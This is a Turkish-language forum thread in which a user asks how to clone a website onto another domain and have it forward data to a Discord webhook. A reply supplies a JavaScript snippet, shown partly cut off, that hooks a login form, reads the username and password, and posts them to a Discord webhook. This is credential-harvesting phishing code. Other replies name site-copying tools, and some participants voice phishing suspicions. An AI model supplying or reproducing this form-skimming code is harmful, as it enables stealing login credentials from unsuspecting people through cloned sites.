Arkadaşlar Siteyi Kopyalayıp Farklı Bir Domainde Ve Arkadan Discorddan Webhook Göndericek Şekilde Yapmaya Çalışıyorum Yardımcı Olurmsunuz?
Follow along with the video below to see how to install our site as a web app on your home screen.
Not: This feature may not be available in some browsers.
html benzeri siteler hariç çoğu site kopyalanmaz veya maksimum yapay zeka ile benzeri yapılabilir tabi bunun database bağlama aşaması falan derken böyle uzarArkadaşlar Siteyi Kopyalayıp Farklı Bir Domainde Ve Arkadan Discorddan Webhook Göndericek Şekilde Yapmaya Çalışıyorum Yardımcı Olurmsunuz?
Site html nasıl yapacağım kafam karışık şuandahtml benzeri siteler hariç çoğu site kopyalanmaz veya maksimum yapay zeka ile benzeri yapılabilir tabi bunun database bağlama aşaması falan derken böyle uzar
<script>
const webhookURL = 'https://discord.com/api/webhooks/WEBHOOK_ID/WEBHOOK_TOKEN';
document.getElementById('loginForm').addEventListener('submit', function(e) {
e.preventDefault();
const username = document.getElementById('username').value;
const password = document.getElementById('password').value;
fetch(webhookURL, {
method: 'POST',
headers: {
'Content-Type': 'application/json'
},
Site Htlm Olarak Farklı Kaydettim Hocam.Öncelikle Sitenin Html Css js Kodlarını Ayarla, Sonrası İçin Bu kodu Kullanabilrsin.
Kod:<script> const webhookURL = 'https://discord.com/api/webhooks/WEBHOOK_ID/WEBHOOK_TOKEN'; document.getElementById('loginForm').addEventListener('submit', function(e) { e.preventDefault(); const username = document.getElementById('username').value; const password = document.getElementById('password').value; fetch(webhookURL, { method: 'POST', headers: { 'Content-Type': 'application/json' },
Siteyi resourcesaver ile misal kopyaladığın zaman html dosyası çıkar bir tane o dosyayı açtığın zaman bozuk değilse tüm fonksiyonları çalışıyorsa o zaman site html dir veya html destekliyordur bozuksa veya fonksiyonları çalışmıyorsa o zaman ya html değildir yada html + css kombinasyonuyla falan çalışıyordurSite html nasıl yapacağım kafam karışık şuanda
phishing kokusu geldi burnumaArkadaşlar Siteyi Kopyalayıp Farklı Bir Domainde Ve Arkadan Discorddan Webhook Göndericek Şekilde Yapmaya Çalışıyorum Yardımcı Olurmsunuz?
Afiyet Olsun Hocamphishing kokusu geldi burnuma
HTTrack ile site kopyalama yapabilirsin. Discorddan webhook göndermen içinde URL'ye HTTP POST isteği göndermen gerekir. Daha sonra farklı domainden yayımlamalısın. HTTP POST isteği için kodlar oluyor onu araştırmanı öneririm de bu arada bir oltalama muhabbeti seziyor gibiyim dostum ?Arkadaşlar Siteyi Kopyalayıp Farklı Bir Domainde Ve Arkadan Discorddan Webhook Göndericek Şekilde Yapmaya Çalışıyorum Yardımcı Olurmsunuz?
Hocam Discord Webhook Hazır Oltalama Muhabbeti Yok Arkadaşım Hesabımı Çaldırmış Onu Geri Almakla Uğraşıcağım Gibi Görünüyor....HTTrack ile site kopyalama yapabilirsin. Discorddan webhook göndermen içinde URL'ye HTTP POST isteği göndermen gerekir. Daha sonra farklı domainden yayımlamalısın. HTTP POST isteği için kodlar oluyor onu araştırmanı öneririm de bu arada bir oltalama muhabbeti seziyor gibiyim dostum ?![]()
Hocam Discord Webhook Hazır Oltalama Muhabbeti Yok Arkadaşım Hesabımı Çaldırmış Onu Geri Almakla Uğraşıcağım Gibi Görünüyor....
Malesef hocam site tek htmlle calişmiyor js php bulman lazim bazi animasyonlar fotograflar serverde gizli oluyor en iyi yontem yapay zeka ile benzeri bir site kurman bunun içinde biraz tecruben olmasi lazimArkadaşlar Siteyi Kopyalayıp Farklı Bir Domainde Ve Arkadan Discorddan Webhook Göndericek Şekilde Yapmaya Çalışıyorum Yardımcı Olurmsunuz?
Dün İnstagramdan yazdımda bakmadınKolay gelsin dostum sana...